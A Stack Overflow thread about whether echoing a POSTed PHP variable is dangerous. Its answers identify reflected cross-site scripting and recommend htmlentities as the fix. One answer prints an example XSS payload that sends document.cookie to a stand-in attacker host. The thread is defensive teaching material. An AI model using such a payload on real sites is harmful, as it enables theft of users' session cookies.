2

I have a textbox in which a user inputs a value and a PHP script echoes it out. The Textbox is sent to the server via POST and is saved in a variable called Temp.

If I create the output script with the below line, will the echo prevents File inclusion or arbitrary PHP injection, assuming that no validations are being done?

<?php echo $Temp; ?>
SilverlightFox
  • 32,436
  • 11
  • 76
  • 145
Andrew Borg
  • 23
  • 3
  • Possible duplicate of [How can I prevent SQL-injection in PHP?](http://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php) – jjwdesign Feb 15 '16 at 21:15

4 Answers4

2

mkaatman's answer may or may not address your question. Javascript is client side, so there isn't any server-side maliciousness happening. If a user were to put something malicious in the text box that you echo back to them, they are only affecting themselves on the client side.

In other words, PHP is not going to execute what the user inputs in that variable if all you are doing is storing and echoing. No harm can be done to the server... and I think that was what you were asking

Kyle Burkett
  • 1,375
  • 12
  • 28
  • I agree with you but I think it's a good practice to use in this situations. – FareedMN Feb 15 '16 at 21:01
  • Have a look at this post on [Cross SIte Scripting](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)). – SilverlightFox Feb 16 '16 at 11:38
  • @SilverlightFox points out that it's possible for one user to intentionally affect another user, but 'reflected Cross Site Scripting' is still only client-side and poses no threat to the server (so I still do not consider it a server side vulnerability). PHP (the server) does NOT execute the code, only user's browsers execute the code. – Kyle Burkett Feb 16 '16 at 20:38
1

No. I could enter malicious javascript code in the input and the browser would execute that code when you viewed the page that had been generated with <?php echo $Temp; ?>

Matt
  • 5,315
  • 1
  • 30
  • 57
1

It's a typical xss vulnerability read more here So always filter any user input right after you got it. php has nice type conversion like (string)$Temp and as mentioned above htmlspecialchars() and htmlentities()

Konstantin Mezentsev
  • 131
  • 4
1

This is a classic reflected Cross Site Scripting vulnerability. Injected code will not execute on the server.

A malicious user could setup their own site that POSTs to your form. The POSTed value could be something like 

<script>
new Img().src = 'https://evil.example.com?' + escape(document.cookie);
</script>

When a user that is logged into your site visits the malicious page, the attacker will retrieve the user's cookies for your site (well any that are not marked as HttpOnly). To mitigate this do the following:

<?php echo htmlentities($Temp); ?>

which will display any script as HTML rather than execute it.

SilverlightFox
  • 32,436
  • 11
  • 76
  • 145